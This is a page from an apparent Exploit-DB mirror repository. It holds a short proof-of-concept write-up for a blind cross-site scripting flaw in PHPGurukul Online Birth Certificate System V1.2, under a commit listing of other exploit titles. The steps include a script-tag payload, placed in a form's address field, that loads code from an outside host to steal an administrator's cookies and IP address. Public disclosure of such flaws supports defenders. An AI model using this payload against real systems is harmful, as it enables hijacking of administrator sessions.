bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51061.txt
Exploit-DB 79023d1f9c DB: 2023-03-26 
22 changes to exploits/shellcodes/ghdb

Password Manager for IIS v2.0 - XSS

DLink DIR 819 A1 - Denial of Service

D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution

Abantecart v1.3.2 - Authenticated Remote Code Execution

Bus Pass Management System 1.0 - Cross-Site Scripting (XSS)

Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution

Employee Performance Evaluation System v1.0 - File Inclusion and RCE

GuppY CMS v6.00.10 - Remote Code Execution

Human Resources Management System v1.0 - Multiple SQLi

ImpressCMS v1.4.3 - Authenticated SQL Injection

Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal

MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution

NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi

Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)

PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS

SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution

Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection

Yoga Class Registration System v1.0 - Multiple SQLi

NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle

_camp_ Raspberry Pi camera server 1.0 -  Authentication Bypass

System Mechanic v15.5.0.61 - Arbitrary Read/Write
2023-03-26 00:16:30 +00:00

28 lines
No EOL
1.1 KiB
Text
Raw Blame History

Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
# Date: 2022-10-02
# Exploit Author: Prasheek Kamble
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
# Version: V 1.2
# Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
# Tested on MAC OS, XAMPP
Steps to reproduce:
1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
2) Fill the form and Enter xss payload "><script src=https://prasheekk05.xss.ht></script> in address field
3) Click on Add Details and intercept the request in Burpsuite
4) After this, the details have been submitted.
5) As soon as admin(Victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired.
6) Now attacker get's the details of victim like ip address, cookies of Victim, etc
7) So attacker is sucessful in getting the victim's ip address and other details.
#POC's
https://ibb.co/kSxFp2g
https://ibb.co/VvSVRsy
https://ibb.co/mSGp4FX
https://ibb.co/hXbJ9TZ
https://ibb.co/M6vS08S
Reference in a new issue View git blame Copy permalink